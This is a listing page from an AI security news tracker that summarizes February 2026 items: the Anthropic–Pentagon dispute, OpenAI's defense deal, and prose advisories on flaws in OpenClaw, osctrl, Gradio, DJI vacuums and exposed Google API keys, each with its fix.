aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

to
Export CSV
3137 items

The trap Anthropic built for itself

infonews
policysafety
Feb 28, 2026

Anthropic, an AI company founded in 2021, lost a $200 million Pentagon contract and faced a federal ban after refusing to allow its technology to be used for mass surveillance or autonomous weapons systems. According to physicist Max Tegmark, Anthropic and other major AI companies like OpenAI and Google DeepMind have contributed to this crisis by resisting binding regulation and repeatedly breaking their own safety promises, most recently when Anthropic dropped its core commitment not to release powerful AI systems until confident they would not cause harm.

TechCrunch

Anthropic’s Claude rises to No. 2 in the App Store following Pentagon dispute

infonews
policy
Feb 28, 2026

Anthropic's Claude AI chatbot has risen to the second most popular free app in Apple's US App Store, jumping from outside the top 100 in late January to number two by early February. This surge in downloads followed a public dispute where Anthropic negotiated with the Pentagon over safeguards to prevent its AI from being used for mass domestic surveillance or fully autonomous weapons, which led President Trump to direct federal agencies to stop using Anthropic products.

The billion-dollar infrastructure deals powering the AI boom

infonews
industry
Feb 28, 2026

AI companies are spending billions of dollars on computing infrastructure to power AI models, with estimates of $3-4 trillion by the end of the decade. Major tech companies like Microsoft, Google, Oracle, and Amazon are competing to provide cloud services and specialized hardware to AI labs, leading to massive deals such as Oracle's $300 billion agreement with OpenAI and Microsoft's $14 billion investment in the company. This infrastructure race is straining power grids and pushing building capacity to its limits as the industry races to meet the enormous computing demands of AI training.

Anthropic's Claude hits No. 2 on Apple's top free apps list after Pentagon rejection

infonews
policy
Feb 28, 2026

Anthropic's Claude AI app jumped to the No. 2 position on Apple's free apps chart after the Trump administration and Department of Defense moved to block government agencies from using the company's technology, citing concerns about Anthropic's refusal to support mass domestic surveillance or fully autonomous weapons. The surge in popularity suggests consumers are responding positively to Anthropic's ethical stance, even as the Pentagon designated the company a supply-chain risk (a classification that prevents defense contractors from using its tools).

ClawJacked Flaw Lets Malicious Sites Hijack Local OpenClaw AI Agents via WebSocket

highnews
security
Feb 28, 2026

OpenClaw fixed a high-severity vulnerability called ClawJacked that let malicious websites hijack local AI agents by exploiting a missing rate-limiting mechanism on the gateway's WebSocket server (a protocol for two-way communication between browsers and servers). An attacker could trick a developer into visiting a malicious site, then use JavaScript to brute-force the gateway password, auto-register as a trusted device, and gain complete control over the AI agent to steal data and execute commands.

OpenAI to work with Pentagon after Anthropic dropped by Trump over company’s ethics concerns

infonews
policy
Feb 28, 2026

OpenAI announced a deal to provide AI technology to classified US military networks, shortly after the Trump administration ended its relationship with Anthropic (a competing AI company that makes Claude) over ethics disagreements. Anthropic had wanted guarantees that its AI would not be used for mass surveillance or autonomous weapons systems (systems that can select and attack targets without human decision-making).

OpenAI’s Sam Altman announces Pentagon deal with ‘technical safeguards’

infonews
policysecurity

AI just leveled up and there are no guardrails anymore

infonews
policysafety

Area Man Accidentally Hacks 6,700 Camera-Enabled Robot Vacuums

infonews
security
Feb 28, 2026

A person discovered a serious security vulnerability in DJI Romo robot vacuums that allowed unauthorized access to 6,700 devices across 24 countries using only the vacuum's 14-digit serial number, granting attackers full access to floor plans, video, and audio feeds from inside homes. The vulnerability exposed how internet-connected home devices with cameras and microphones can be hijacked remotely, raising broader concerns about the security of similar smart home gadgets. DJI has since patched the vulnerability in response to the discovery being publicly disclosed.

Her husband wanted to use ChatGPT to create sustainable housing. Then it took over his life.

infonews
safety
Feb 28, 2026

This article describes a tragedy where a man spent 12 hours daily using ChatGPT (a conversational AI) and subsequently died by suicide, despite having no prior history of depression or suicidal thoughts. His wife questions whether the intensive chatbot use contributed to his death, as he was previously described as an optimistic person.

Thousands of Public Google Cloud API Keys Exposed with Gemini Access After API Enablement

highnews
securityprivacy

Pentagon Designates Anthropic Supply Chain Risk Over AI Military Dispute

infonews
policysafety

OpenAI strikes deal with Pentagon, hours after rival Anthropic was blacklisted by Trump

infonews
policyindustry

GHSA-4rv8-5cmm-2r22: osctrl has Stored Cross-Site Scripting (XSS) in On-Demand Query List

mediumvulnerability
security
Feb 27, 2026
CVE-2026-28280

osctrl-admin, a system administration tool, has a stored XSS vulnerability (cross-site scripting, where malicious code injected into a website executes when other users view it) in its on-demand query list. Users with basic query permissions can inject harmful JavaScript that runs in the browsers of anyone viewing the query list, including administrators, potentially allowing attackers to steal credentials or take control of the entire platform.

GHSA-rchw-322g-f7rm: osctrl is Vulnerable to OS Command Injection via Environment Configuration

highvulnerability
security
Feb 27, 2026
CVE-2026-28279

osctrl-admin has a vulnerability where an authenticated administrator can inject arbitrary shell commands (OS command injection, where an attacker runs unauthorized commands on a system) through the hostname parameter when setting up environments. These commands get embedded into enrollment scripts and execute on every computer that enrolls using that compromised environment, running with the highest privilege level before osquery (endpoint monitoring software) is even installed.

Defense secretary Pete Hegseth designates Anthropic a supply chain risk

infonews
policyindustry

OpenAI fires employee for using confidential info on prediction markets

infoincident
securitypolicy

How Amazon's massive stake in OpenAI could boost its AI and cloud businesses

infonews
industry
Feb 27, 2026

Amazon announced a strategic partnership with OpenAI involving up to $50 billion in investment, with OpenAI committing to spend $100 billion on Amazon Web Services (AWS, Amazon's cloud computing platform) over eight years. The deal includes OpenAI deploying Amazon's AI chips and the two companies jointly developing customized AI models, marking a significant expansion of Amazon's AI infrastructure investments alongside its existing partnerships with OpenAI's competitor Anthropic.

CVE-2026-28416: Gradio is an open-source Python package designed for quick prototyping. Prior to version 6.6.0, a Server-Side Request Fo

highvulnerability
security
Feb 27, 2026
CVE-2026-28416

Gradio, a Python package for building AI demos, had a vulnerability (SSRF, or server-side request forgery, where an attacker tricks a server into making requests it shouldn't) before version 6.6.0 that let attackers access internal services and private networks by hosting a malicious Gradio Space that victims load with the `gr.load()` function.

CVE-2026-28415: Gradio is an open-source Python package designed for quick prototyping. Prior to version 6.6.0, the _redirect_to_target(

mediumvulnerability
security
Feb 27, 2026
CVE-2026-28415

Gradio, a Python package for building AI interfaces quickly, has a vulnerability in versions before 6.6.0 where the _redirect_to_target() function doesn't validate the _target_url parameter, allowing attackers to redirect users to malicious external websites through the /logout and /login/callback endpoints on apps using OAuth (a login system). This vulnerability only affects Gradio apps running on Hugging Face Spaces with gr.LoginButton enabled.

Previous31 / 157Next
TechCrunch
TechCrunch
CNBC Technology

Fix: OpenClaw released version 2026.2.25 on February 26, 2026, which fixed the vulnerability. Users are advised to "apply the latest updates as soon as possible, periodically audit access granted to AI agents, and enforce appropriate governance controls for non-human (aka agentic) identities."

The Hacker News
The Guardian Technology
Feb 28, 2026

OpenAI announced a deal allowing the Department of Defense to use its AI models on classified networks, following a dispute where rival Anthropic refused to agree to unrestricted military use without safeguards against mass domestic surveillance and fully autonomous weapons. Sam Altman stated that OpenAI's agreement includes technical protections addressing these same concerns, with OpenAI building a 'safety stack' (a set of security and control measures) and deploying engineers to ensure the models behave correctly.

Fix: According to Altman, OpenAI will 'build technical safeguards to ensure our models behave as they should' and will 'deploy engineers with the Pentagon to help with our models and to ensure their safety.' Additionally, the government will allow OpenAI to build its own 'safety stack to prevent misuse' and 'if the model refuses to do a task, then the government would not force OpenAI to make it do that task.'

TechCrunch
Feb 28, 2026

AI systems have rapidly become more powerful in early 2026, advancing from chatbots to autonomous agents (AI systems that can reason, plan, and complete tasks independently) capable of doing real work. However, safety guardrails (protections designed to prevent harm) are being removed as companies compete: Anthropic abandoned its core safety commitments, researchers at major AI companies are resigning over safety concerns, and there is significant political and financial pressure against AI regulation.

CNBC Technology

Fix: DJI has fixed the vulnerability in response to the findings being reported.

Wired (Security)
The Guardian Technology
Feb 28, 2026

Google Cloud API keys (unique identifiers used for billing and accessing Google services) that were embedded in websites for basic functions like maps were automatically granted access to Gemini (Google's AI model) when users enabled the Gemini API on their projects, without any warning. This allowed attackers who found these exposed keys on the public internet to access private files, cached data, and run expensive AI requests that get billed to the victims, with nearly 3,000 such keys discovered by security researchers.

Fix: Google has implemented proactive measures to detect and block leaked API keys that attempt to access the Gemini API. Additionally, users are advised to: (1) check their Google Cloud projects to verify if AI-related APIs are enabled, (2) if they are enabled and publicly accessible in client-side JavaScript or public repositories, rotate the keys, starting with the oldest keys first, as those are most likely to have been deployed publicly under the old guidance that API keys were safe to share.

The Hacker News
Feb 27, 2026

The U.S. Pentagon designated Anthropic (an AI company) as a 'supply chain risk' after negotiations broke down over the company's refusal to allow its AI model Claude to be used for mass domestic surveillance or fully autonomous weapons systems. Anthropic argued these uses are unsafe and incompatible with democratic values, while the Pentagon insisted it needed unrestricted access to the technology for military operations.

The Hacker News
Feb 27, 2026

OpenAI reached an agreement with the U.S. Department of Defense to deploy its AI models on classified military networks, while the Trump administration simultaneously blacklisted rival Anthropic as a 'Supply-Chain Risk to National Security' and banned federal agencies from using Anthropic's technology. The key difference was that OpenAI agreed to the DoD's terms including safety restrictions on domestic mass surveillance and autonomous weapons, whereas Anthropic had refused to accept unrestricted military use cases and was seeking guarantees that its models wouldn't be used for fully autonomous weapons or mass surveillance.

Fix: According to Altman, OpenAI committed to building 'technical safeguards to ensure its models behave as they should' and will deploy personnel to 'help with our models and to ensure their safety.' Additionally, OpenAI asked the DoD to offer these same safety terms to all AI companies.

CNBC Technology

Fix: Fixed in osctrl v0.5.0. Users should upgrade immediately.

Hugging Face Security Advisories

Fix: Fixed in osctrl v0.5.0. Users should upgrade immediately. As workarounds, restrict osctrl administrator access to trusted personnel, review existing environment configurations for suspicious hostnames, and monitor enrollment scripts for unexpected commands.

GitHub Advisory Database
Feb 27, 2026

The US Secretary of Defense designated Anthropic, an AI company that makes Claude (an LLM, or large language model that generates text), as a supply-chain risk and banned its products from federal government use. This decision could affect major tech companies like Palantir and AWS that use Claude in their work with the Pentagon, though it's unclear how broadly the ban will apply to companies contracting with Claude for non-military purposes.

The Verge (AI)
Feb 27, 2026

OpenAI fired an employee who used confidential company information to make trades on prediction markets (platforms like Polymarket where people bet money on real-world events). The employee's actions violated OpenAI's internal policy against using insider information for personal financial gain.

TechCrunch
CNBC Technology

Fix: Update Gradio to version 6.6.0 or later, which fixes the issue.

NVD/CVE Database

Fix: Update to Gradio version 6.6.0 or later. Starting in version 6.6.0, the _target_url parameter is sanitized to only use the path, query, and fragment, stripping any scheme or host.

NVD/CVE Database